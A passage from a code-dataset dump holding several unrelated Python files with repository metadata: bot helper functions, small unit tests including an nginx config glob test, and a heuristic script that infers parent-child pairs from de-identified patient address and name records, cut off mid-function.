2019-06-05T18:54:50.000Z
|
functions.py
|
daleshingles/TheDon
|
756fe1904e640e1e6b314eb652e2643dd1e59ec8
|
[
"MIT"
] | 1
|
2019-05-29T23:47:28.000Z
|
2019-05-29T23:47:28.000Z
|
from pytz import timezone
from datetime import date, datetime, time
from dateutil import tz, parser
import random
def to_time(utc_time):
ratime = timezone('America/Chicago')
localtime = utc_time.astimezone(ratime)
return localtime.strftime('%b %d %H:%M')
def from_time(ra_time):
#ratime = timezone('America/Chicago')
utctimezone = timezone('Etc/Greenwich')
utctime = ra_time.astimezone(utctimezone)
return utctime.strftime('%b %d %H:%M')
def my_parser(*args, default_tzinfo=tz.gettz("America/Chicago"), **kwargs):
dt = parser.parse(*args, **kwargs)
return dt.replace(tzinfo=dt.tzinfo or default_tzinfo)
def bart_image():
a = ['https://i.imgur.com/KG9qUYb.png','https://i.imgur.com/WxUtb6T.jpg','https://i.imgur.com/NhprtjJ.jpg','https://i.imgur.com/pXilsu7.jpg','https://i.imgur.com/dYiYiFm.jpg','https://i.imgur.com/uY4M6Mx.jpg','https://i.imgur.com/nuKoOZk.png','https://i.imgur.com/QF70JM8.jpg','https://i.imgur.com/PCmXj8t.jpg','https://i.imgur.com/xVBs8cX.jpg','https://i.imgur.com/FNbeATG.jpg','https://i.imgur.com/Z4ufOZH.jpg','https://i.imgur.com/N385AB7.jpg','https://i.imgur.com/ErvBDk9.jpg','https://i.imgur.com/jeEXih2.jpg','https://i.imgur.com/uc1bBt8.png','https://i.imgur.com/CDB5D4Q.png','https://i.imgur.com/fXkke9G.jpg','https://i.imgur.com/kjqo2gN.jpg','https://i.imgur.com/MAdxt28.jpg','https://i.imgur.com/7l0Ai4T.jpg','https://i.imgur.com/qX4x2aD.jpg','https://i.imgur.com/elzhjLZ.jpg','https://i.imgur.com/vy7GtkY.png','https://i.imgur.com/dWwG2Uk.png','https://i.imgur.com/550oh1c.jpg','https://i.imgur.com/i4TEYNr.jpg','https://i.imgur.com/xijNZRu.jpg','https://i.imgur.com/Y9vOacY.jpg','https://i.imgur.com/yAFC7y6.png','https://i.imgur.com/1MAw2SD.png','https://i.imgur.com/9cMaTmS.jpg','https://i.imgur.com/GwqLVE7.jpg','https://i.imgur.com/ql3td93.jpg','https://i.imgur.com/hy1HLhj.jpg','https://i.imgur.com/VZMxKMk.jpg','https://i.imgur.com/dR1oFsw.jpg','https://i.imgur.com/Z9sz3oJ.jpg','https://i.imgur.com/8oqNp8h.jpg','https://i.imgur.com/GSrSjKj.jpg','https://i.imgur.com/frz0Av5.jpg','https://i.imgur.com/Ctk2owR.jpg','https://i.imgur.com/1Zld9zy.jpg','https://i.imgur.com/rogLdLS.jpg','https://i.imgur.com/cSL9Awz.jpg','https://i.imgur.com/MDO2UwT.jpg','https://i.imgur.com/b42QDdi.jpg','https://i.imgur.com/hCkiHme.png','https://i.imgur.com/P6jrhO6.png','https://i.imgur.com/oHVLwQG.png','https://i.imgur.com/ExY0mb9.png','https://i.imgur.com/Odb8VTK.png','https://i.imgur.com/2nLE8Aa.png','https://i.imgur.com/zlu2371.png','https://i.imgur.com/eH6avqy.png','https://i.imgur.com/vKJ5Jif.png','https://i.imgur.com/g5Le5rK.png','https://i.imgur.com/TKCaAzR.png','https://i.imgur.com/qWcvWLQ.png','https://i.imgur.com/xq8w053.png','https://i.imgur.com/vClvm18.png','https://i.imgur.com/DQAziIi.png','https://i.imgur.com/1RXNvS7.png','https://i.imgur.com/ib1e3f3.png','https://i.imgur.com/DG0tJVx.jpg','https://i.imgur.com/ovTSOfX.jpg','https://i.imgur.com/YzSH3rI.png','https://i.imgur.com/lpr9nbT.jpg','https://i.imgur.com/BUp4xNj.jpg','https://i.imgur.com/QVNAiz5.jpg','https://i.imgur.com/zee3vTs.jpg','https://i.imgur.com/Z6jQq4G.jpg','https://i.imgur.com/yVI6beX.jpg','https://i.imgur.com/cmLarXA.jpg','https://i.imgur.com/U9F7j9f.jpg','https://i.imgur.com/2bjkZe0.jpg','https://i.imgur.com/21fGrWZ.jpg','https://i.imgur.com/jlSWrSl.jpg','https://i.imgur.com/GMfVRic.jpg','https://i.imgur.com/zraoFoD.jpg','https://i.imgur.com/0cuwASi.jpg','https://i.imgur.com/0HUsG7K.jpg','https://i.imgur.com/DrRZ87g.jpg','https://i.imgur.com/jP2LbJl.jpg','https://i.imgur.com/RGqjy9b.jpg','https://i.imgur.com/6918pkd.jpg','https://i.imgur.com/TeaU24j.jpg','https://i.imgur.com/G2vg77A.jpg','https://i.imgur.com/Kzze4Lf.jpg','https://i.imgur.com/UgVeCrN.jpg','https://i.imgur.com/TvsEdkG.jpg','https://i.imgur.com/05QmS3w.jpg','https://i.imgur.com/HgxVnyT.jpg','https://i.imgur.com/JjgFOKk.jpg','https://i.imgur.com/EPKSrod.jpg','https://i.imgur.com/7ehcrt6.jpg','https://i.imgur.com/1U6GHUW.jpg','https://i.imgur.com/MKATl6d.jpg','https://i.imgur.com/q9RlBek.jpg','https://i.imgur.com/fTviVXd.jpg','https://i.imgur.com/2csk6ni.jpg','https://i.imgur.com/LOmYAFe.jpg','https://i.imgur.com/G0JRlcM.jpg','https://i.imgur.com/UuotaSZ.jpg','https://i.imgur.com/5xyw7dm.jpg','https://i.imgur.com/KOXUDbH.jpg']
random.shuffle(a)
return a[0]
def random_team():
a = ["Atlanta Braves","Miami Marlins","New York Mets","Philadelphia Phillies","Washington Nationals","Chicago Cubs","Cincinnati Reds","Milwaukee Brewers","Pittsburgh Pirates","St.Louis Cardinals","Arizona Diamondbacks","Colorado Rockies","Los Angeles Dodgers","San Diego Padres","San Francisco Giants","Baltimore Orioles","Boston Red Sox","New York Yankees","Tampa Bay Rays","Toronto Blue Jays","Chicago White Sox","Cleveland Indians","Detroit Tigers","Kansas City Royals","Minnesota Twins","Houston Astros","Los Angeles Angels","Oakland Athletics","Seattle Mariners","Texas Rangers"]
return a[hash(str(date)) % len(a)]
| 155.125
| 3,613
| 0.710516
| 817
| 4,964
| 4.30355
| 0.275398
| 0.180887
| 0.331627
| 0.422071
| 0.534414
| 0.008532
| 0
| 0
| 0
| 0
| 0
| 0.028416
| 0.035858
| 4,964
| 31
| 3,614
| 160.129032
| 0.706226
| 0.007252
| 0
| 0
| 0
| 0
| 0.779379
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.227273
| false
| 0
| 0.181818
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3fbd51088d4d5c63c30c64e0ce56608253c047ba
| 91
|
py
|
Python
|
tests/resources/test_cases/union_fun.py
|
dertilo/coding
|
9b827f2b02900f1d8e080fbde4cdb08a365572e7
|
[
"MIT"
] | null | null | null |
tests/resources/test_cases/union_fun.py
|
dertilo/coding
|
9b827f2b02900f1d8e080fbde4cdb08a365572e7
|
[
"MIT"
] | null | null | null |
tests/resources/test_cases/union_fun.py
|
dertilo/coding
|
9b827f2b02900f1d8e080fbde4cdb08a365572e7
|
[
"MIT"
] | null | null | null |
def union_fun(x):
return x
def main():
s = union_fun("foo")
s = union_fun(1)
| 11.375
| 24
| 0.56044
| 16
| 91
| 3
| 0.5625
| 0.5
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015385
| 0.285714
| 91
| 7
| 25
| 13
| 0.723077
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3fd3a7eeb9e8f16e46b3a60f2eaaa26a210f8981
| 59
|
py
|
Python
|
web_website/tests/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | null | null | null |
web_website/tests/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | 1
|
2020-05-03T04:27:29.000Z
|
2020-05-03T04:27:29.000Z
|
web_website/tests/__init__.py
|
eneldoserrata/misc-addons
|
6f3b94d8a71d603d9ad449f96edfc66385e78080
|
[
"MIT"
] | 2
|
2020-05-09T02:08:59.000Z
|
2022-03-21T06:37:15.000Z
|
from . import test_website_dependent
from . import test_ui
| 19.666667
| 36
| 0.830508
| 9
| 59
| 5.111111
| 0.666667
| 0.434783
| 0.608696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135593
| 59
| 2
| 37
| 29.5
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3fd7dd43357f26fb6978a0868c30ecee48376692
| 5,664
|
py
|
Python
|
test/unit/agent/common/util/glib.py
|
dp92987/nginx-amplify-agent
|
1b2eed6eab52a82f35974928d75044451b4bedaf
|
[
"BSD-2-Clause"
] | 308
|
2015-11-17T13:15:33.000Z
|
2022-03-24T12:03:40.000Z
|
test/unit/agent/common/util/glib.py
|
dp92987/nginx-amplify-agent
|
1b2eed6eab52a82f35974928d75044451b4bedaf
|
[
"BSD-2-Clause"
] | 211
|
2015-11-16T15:27:41.000Z
|
2022-03-28T16:20:15.000Z
|
test/unit/agent/common/util/glib.py
|
dp92987/nginx-amplify-agent
|
1b2eed6eab52a82f35974928d75044451b4bedaf
|
[
"BSD-2-Clause"
] | 80
|
2015-11-16T18:20:30.000Z
|
2022-03-02T12:47:56.000Z
|
# -*- coding: utf-8 -*-
from hamcrest import *
from test.base import BaseTestCase
import amplify.agent.common.util.glib as glib
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "grant.hulegaard@nginx.com"
class GlibTestCase(BaseTestCase):
def test_overall(self):
excludes = [
'access-frontend-*.log',
'receiver1-*.log',
'frontend2.log',
'/var/log/nginx/frontend/*',
'/var/log/naas/'
]
file_paths = [
'/var/log/nginx/frontend/asdf.log', # exclude 4
'/var/log/nginx/frontend/frontend3.log', # exclude 4
'/var/log/blank.log',
'/var/log/frontend2.log', # exclude 3
'/var/receiver1-2012.log', # exclude 2
'/var/log/naas/blah.log', # exclude 5
'access-frontend-asf.log' # exclude 1
]
results = file_paths
for exclude_pathname in excludes:
for match in glib.glib(file_paths, exclude_pathname):
results.remove(match)
assert_that(results, has_length(1))
assert_that(results[0], equal_to('/var/log/blank.log'))
def test_more(self):
pattern = '/etc/nginx/*.conf'
file_paths = [
'/etc/nginx/nginx.conf',
'/etc/nginx/bir/aaa/subdir/host.conf',
'/etc/nginx/conf.d/blockips.conf',
'/etc/nginx/conf.d/default.conf',
'/etc/nginx/conf.d/default.conf.bak',
'/etc/nginx/conf.d/host.conf',
'/etc/nginx/conf.d/proxy.conf',
'/etc/nginx/conf.d/ssl.conf',
'/etc/nginx/conf.d/servers/bamboo_server.conf',
'/etc/nginx/conf.d/servers/dev1_server.conf',
'/etc/nginx/conf.d/servers/dev1db00_server.conf',
'/etc/nginx/conf.d/servers/docker_build_server.conf',
'/etc/nginx/conf.d/servers/docker_registry_server.conf',
'/etc/nginx/conf.d/servers/eurotax_proxy.conf',
'/etc/nginx/conf.d/servers/int01_server.conf',
'/etc/nginx/conf.d/servers/int01db00_server.conf',
'/etc/nginx/conf.d/servers/nexus_server.conf',
'/etc/nginx/conf.d/servers/soft2run_server.conf',
'/etc/nginx/conf.d/servers/spearhead_server.conf',
'/etc/nginx/conf.d/servers/toolsdb_server.conf',
'/etc/nginx/conf.d/servers/webcache_server.conf.bak',
'/etc/nginx/conf.d/servers/webcache_server_working.conf',
'/etc/nginx/conf.d/tcp_streams/iboxdb_server.conf',
'/etc/nginx/ssl/soft2run_ssl_cert.conf',
'/etc/nginx/ssl/sph_ssl_cert.conf'
]
results = glib.glib(file_paths, pattern)
assert_that(results, has_length(1))
assert_that(results[0], equal_to('/etc/nginx/nginx.conf'))
def test_more_directories(self):
pattern = '/etc/nginx/conf.d/*/*.conf'
file_paths = [
'/etc/nginx/nginx.conf',
'/etc/nginx/bir/aaa/subdir/host.conf',
'/etc/nginx/conf.d/blockips.conf',
'/etc/nginx/conf.d/default.conf',
'/etc/nginx/conf.d/default.conf.bak',
'/etc/nginx/conf.d/host.conf',
'/etc/nginx/conf.d/proxy.conf',
'/etc/nginx/conf.d/ssl.conf',
'/etc/nginx/conf.d/servers/bamboo_server.conf',
'/etc/nginx/conf.d/servers/dev1_server.conf',
'/etc/nginx/conf.d/servers/dev1db00_server.conf',
'/etc/nginx/conf.d/servers/docker_build_server.conf',
'/etc/nginx/conf.d/servers/docker_registry_server.conf',
'/etc/nginx/conf.d/servers/eurotax_proxy.conf',
'/etc/nginx/conf.d/servers/int01_server.conf',
'/etc/nginx/conf.d/servers/int01db00_server.conf',
'/etc/nginx/conf.d/servers/nexus_server.conf',
'/etc/nginx/conf.d/servers/soft2run_server.conf',
'/etc/nginx/conf.d/servers/spearhead_server.conf',
'/etc/nginx/conf.d/servers/toolsdb_server.conf',
'/etc/nginx/conf.d/servers/webcache_server.conf.bak',
'/etc/nginx/conf.d/servers/webcache_server_working.conf',
'/etc/nginx/conf.d/tcp_streams/iboxdb_server.conf',
'/etc/nginx/ssl/soft2run_ssl_cert.conf',
'/etc/nginx/ssl/sph_ssl_cert.conf'
]
results = glib.glib(file_paths, pattern)
assert_that(results, has_length(15))
matches = [
'/etc/nginx/conf.d/servers/bamboo_server.conf',
'/etc/nginx/conf.d/servers/dev1_server.conf',
'/etc/nginx/conf.d/servers/dev1db00_server.conf',
'/etc/nginx/conf.d/servers/docker_build_server.conf',
'/etc/nginx/conf.d/servers/docker_registry_server.conf',
'/etc/nginx/conf.d/servers/eurotax_proxy.conf',
'/etc/nginx/conf.d/servers/int01_server.conf',
'/etc/nginx/conf.d/servers/int01db00_server.conf',
'/etc/nginx/conf.d/servers/nexus_server.conf',
'/etc/nginx/conf.d/servers/soft2run_server.conf',
'/etc/nginx/conf.d/servers/spearhead_server.conf',
'/etc/nginx/conf.d/servers/toolsdb_server.conf',
'/etc/nginx/conf.d/servers/webcache_server.conf.bak',
'/etc/nginx/conf.d/servers/webcache_server_working.conf',
'/etc/nginx/conf.d/tcp_streams/iboxdb_server.conf'
]
for result in results:
assert_that(result, any_of(*matches))
# TODO: Add more tests for individual instances and edge cases.
| 41.647059
| 69
| 0.599929
| 721
| 5,664
| 4.560333
| 0.165049
| 0.16545
| 0.215328
| 0.229319
| 0.761253
| 0.738139
| 0.738139
| 0.738139
| 0.738139
| 0.738139
| 0
| 0.013349
| 0.246116
| 5,664
| 135
| 70
| 41.955556
| 0.756674
| 0.025247
| 0
| 0.622807
| 0
| 0
| 0.572569
| 0.541546
| 0
| 0
| 0
| 0.007407
| 0.052632
| 1
| 0.026316
| false
| 0
| 0.026316
| 0
| 0.061404
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b7739416d6abe02092e5d04875f0a01a8c7cb6af
| 38,076
|
py
|
Python
|
Source/decisionTreeV7.py
|
xiayuan-huang/E-pedigrees
|
5b49cbeabf60432abb037b0a33780f9c486ec84c
|
[
"MIT"
] | null | null | null |
Source/decisionTreeV7.py
|
xiayuan-huang/E-pedigrees
|
5b49cbeabf60432abb037b0a33780f9c486ec84c
|
[
"MIT"
] | null | null | null |
Source/decisionTreeV7.py
|
xiayuan-huang/E-pedigrees
|
5b49cbeabf60432abb037b0a33780f9c486ec84c
|
[
"MIT"
] | null | null | null |
'''
@author: xiayuanhuang
'''
'''
debugging child's age larger than parents'age
'''
import readDataV2
import datetime
class DT(object):
def __init__(self, addressFile, nameFile, demoFile, accountFile):
d = readDataV2.ReadData()
d.readAddress(addressFile)
d.readName(nameFile)
d.readDemo(demoFile)
d.readAccount(accountFile)
# d.readAddress('/Users/xiayuanhuang/documents/project/address_deid.csv')
# d.readName('/Users/xiayuanhuang/documents/project/name_deid.csv')
# d.readDemo('/Users/xiayuanhuang/documents/project/demo_deid.csv')
# d.readAccount('/Users/xiayuanhuang/documents/project/account_deid.csv')
# d.readAddress('test_address.txt')
# d.readName('test_name.txt')
# d.readDemo('test_demo.txt')
# d.readAccount('test_account.txt')
self.data = d.data
self.data2 = d.data2
self.data3 = d.data3
self.data4 = d.data4
self.address = d.address
self.lastName = d.lastName
self.gender = d.gender
self.age = d.age
self.dob = d.dob
self.dateOfDeceased = d.dateOfDeceased
self.accountToID = d.accountToID
self.account = d.account
self.phone = d.phone
def predict(self):
self.p_c = []
for i in self.address:
if len(self.address[i]) > 1:
IDs= list(set(self.address[i]))
#print(adds)
self.relation(i, IDs)
def relation(self, adds, ids):
num = len(ids)
for i in range(num-1):
if ids[i] not in self.gender:
continue
for j in range(i+1, num):
id1 = ids[i]
id2 = ids[j]
if id2 not in self.gender:
continue
#print(num, ids, id1, id2)
for year_range_id1 in self.data[id1][adds]:
for year_range_id2 in self.data[id2][adds]:
y1 = year_range_id1[0]
y2 = year_range_id1[1]
y3 = year_range_id2[0]
y4 = year_range_id2[1]
if y1 =='':
y1 = 0
else:
y1 = int(y1)
if y2 =='':
y2 = datetime.datetime.now().year
else:
y2 = int(y2)
if y3 == '':
y3 = 0
else:
y3 = int(y3)
if y4 == '':
y4 = datetime.datetime.now().year
else:
y4 = int(y4)
a = range(y1, y2+1)
b = range(y3, y4+1)
if self.age[id1] == '' or self.age[id2] == '':
break
if len(set(a).intersection(set(b)))>=3:
names1 = list(self.lastName[id1].keys())
names2 = list(self.lastName[id2].keys())
intername = list(set(names1).intersection(set(names2)))
if len(intername) == 0:
break
else:
nameOverlap = False
for na in intername:
for period_name_id1 in self.lastName[id1][na]:
for period_name_id2 in self.lastName[id2][na]:
newy1 = period_name_id1[0]
newy2 = period_name_id1[1]
newy3 = period_name_id2[0]
newy4 = period_name_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=3:
nameOverlap = True
break
else:
continue
else:
continue
break
if nameOverlap:
if 18<=abs(int(self.dob[id1])-int(self.dob[id2])) and abs(int(self.dob[id1])-int(self.dob[id2]))<=45:
# make sure parent's deceased date is later than child's date of birth
if int(self.dob[id1]) < int(self.dob[id2]):
elderOne = id1
youngerOne = id2
else:
elderOne = id2
youngerOne = id1
if elderOne in self.dateOfDeceased:
if int(self.dateOfDeceased[elderOne]) < int(self.dob[youngerOne]):
break
flagAcc = False
flagPhone = False
if id1 in self.account and id2 in self.account:
acc1 = list(self.account[id1].keys())
acc2 = list(self.account[id2].keys())
interacc = list(set(acc1).intersection(set(acc2)))
if len(interacc) == 0:
pass
else:
for acc in interacc:
for period_acc_id1 in self.account[id1][acc]:
for period_acc_id2 in self.account[id2][acc]:
newy1 = period_acc_id1[0]
newy2 = period_acc_id1[1]
newy3 = period_acc_id2[0]
newy4 = period_acc_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagAcc = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if id1 in self.phone and id2 in self.phone:
phone1 = list(self.phone[id1].keys())
phone2 = list(self.phone[id2].keys())
interpho = list(set(phone1).intersection(set(phone2)))
if len(interpho) == 0:
pass
else:
for ph in interpho:
for period_phone_id1 in self.phone[id1][ph]:
for period_phone_id2 in self.phone[id2][ph]:
newy1 = period_phone_id1[0]
newy2 = period_phone_id1[1]
newy3 = period_phone_id2[0]
newy4 = period_phone_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagPhone = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if flagAcc or flagPhone:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if 0<=abs(int(self.dob[id1])-int(self.dob[id2])) and abs(int(self.dob[id1])-int(self.dob[id2]))<=16:
#add to sibling relationship
flagAcc = False
flagPhone = False
if id1 in self.account and id2 in self.account:
acc1 = list(self.account[id1].keys())
acc2 = list(self.account[id2].keys())
interacc = list(set(acc1).intersection(set(acc2)))
if len(interacc) == 0:
pass
else:
for acc in interacc:
for period_acc_id1 in self.account[id1][acc]:
for period_acc_id2 in self.account[id2][acc]:
newy1 = period_acc_id1[0]
newy2 = period_acc_id1[1]
newy3 = period_acc_id2[0]
newy4 = period_acc_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagAcc = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
#self.p_c.append(pair)
else:
pair = (id1, id2)
#self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
#self.p_c.append(pair)
else:
pair = (id2, id1)
#self.p_c.append(pair)
if id1 in self.phone and id2 in self.phone:
phone1 = list(self.phone[id1].keys())
phone2 = list(self.phone[id2].keys())
interpho = list(set(phone1).intersection(set(phone2)))
if len(interpho) == 0:
pass
else:
for ph in interpho:
for period_phone_id1 in self.phone[id1][ph]:
for period_phone_id2 in self.phone[id2][ph]:
newy1 = period_phone_id1[0]
newy2 = period_phone_id1[1]
newy3 = period_phone_id2[0]
newy4 = period_phone_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagPhone = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
#self.p_c.append(pair)
else:
pair = (id1, id2)
#self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
#self.p_c.append(pair)
else:
pair = (id2, id1)
#self.p_c.append(pair)
if flagAcc or flagPhone:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
#self.p_c.append(pair)
else:
pair = (id1, id2)
#self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
#self.p_c.append(pair)
else:
pair = (id2, id1)
#self.p_c.append(pair)
else:
if 18<=abs(int(self.dob[id1])-int(self.dob[id2])) and abs(int(self.dob[id1])-int(self.dob[id2]))<=45 and min(int(self.age[id1]), int(self.age[id2]))<3:
'''
here the condition was hard coded to 2014 since the most recent birth year recorded in the file was 2014
set the min age of one pair of individuals blow 3 years old
'''
if int(self.dob[id1]) < int(self.dob[id2]):
elderOne = id1
youngerOne = id2
else:
elderOne = id2
youngerOne = id1
if elderOne in self.dateOfDeceased:
if int(self.dateOfDeceased[elderOne]) < int(self.dob[youngerOne]):
break
flagAcc = False
flagPhone = False
if id1 in self.account and id2 in self.account:
acc1 = list(self.account[id1].keys())
acc2 = list(self.account[id2].keys())
interacc = list(set(acc1).intersection(set(acc2)))
if len(interacc) == 0:
pass
else:
for acc in interacc:
for period_acc_id1 in self.account[id1][acc]:
for period_acc_id2 in self.account[id2][acc]:
newy1 = period_acc_id1[0]
newy2 = period_acc_id1[1]
newy3 = period_acc_id2[0]
newy4 = period_acc_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagAcc = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if id1 in self.phone and id2 in self.phone:
phone1 = list(self.phone[id1].keys())
phone2 = list(self.phone[id2].keys())
interpho = list(set(phone1).intersection(set(phone2)))
if len(interpho) == 0:
pass
else:
for ph in interpho:
for period_phone_id1 in self.phone[id1][ph]:
for period_phone_id2 in self.phone[id2][ph]:
newy1 = period_phone_id1[0]
newy2 = period_phone_id1[1]
newy3 = period_phone_id2[0]
newy4 = period_phone_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagPhone = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if flagAcc or flagPhone:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
